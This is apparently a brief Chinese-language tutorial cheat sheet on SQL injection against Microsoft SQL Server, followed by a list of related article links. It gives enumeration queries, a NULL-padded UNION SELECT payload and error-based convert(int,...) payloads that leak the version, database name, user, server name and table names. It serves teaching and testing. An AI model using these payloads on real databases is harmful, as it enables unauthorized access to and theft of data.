Mssql数据注入

1.查询用户创建的数据表

select id,name from sysobjects where xtype='u' ; 

2.查询用户创建数据表的具体列名

select * from syscolumns where  id= 上一步获取的id值;

3.查询具体内容

select id,字段名 from 数据表名;

4.数据库名

db_name()

5.用户登录名

suser_name()

6.使用联合查询,不能直接union select 1,2,3..,而是需要用nuIl填充字段

例如:
union select 1,null,column name from information schema.columns where table name='admin'

7.根据报错获取信息

convert(int,@@version):获取版本信息

convert(int, db_name())数据库名字

convert(int,user)当前用户名

convert(int,@@SERVERNAME) 服务器主机的信息

例如:

# 获取数据表 top 1 =limit 0,1

convert(int,(select top 1 table_name from information_schema.tables where table_schema=db_name()))

相关推荐

  1. MSsql数据库 sql注入

    2024-06-11 16:54:02       17 阅读
  2. 数据库MSSQL 注入入门级的讲解

    2024-06-11 16:54:02       31 阅读
  3. MySQL注入入门简述

    2024-06-11 16:54:02       40 阅读
  4. MySQL SQL 注入

    2024-06-11 16:54:02       37 阅读
  5. MSSQL注入的入门讲解

    2024-06-11 16:54:02       39 阅读
  6. MySQL安全(二)SQL注入

    2024-06-11 16:54:02       30 阅读

最近更新

  1. TCP协议是安全的吗?

    2024-06-11 16:54:02       19 阅读
  2. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2024-06-11 16:54:02       20 阅读
  3. 【Python教程】压缩PDF文件大小

    2024-06-11 16:54:02       20 阅读
  4. 通过文章id递归查询所有评论(xml)

    2024-06-11 16:54:02       20 阅读

热门阅读

  1. 第三十篇-Ollama-TeslaP40-Ollama-Qwen2-57B等速度

    2024-06-11 16:54:02       12 阅读
  2. Comparison of manual and robotic cleaning

    2024-06-11 16:54:02       10 阅读
  3. 十种排序方法

    2024-06-11 16:54:02       8 阅读
  4. C#类库打包支持多个版本的类库

    2024-06-11 16:54:02       8 阅读
  5. 嵌入式软件测试相关分析

    2024-06-11 16:54:02       11 阅读
  6. 探索HTML5新Input类型:重塑表单交互的未来

    2024-06-11 16:54:02       9 阅读
  7. What are ADS-B OUT and ADS-B IN

    2024-06-11 16:54:02       11 阅读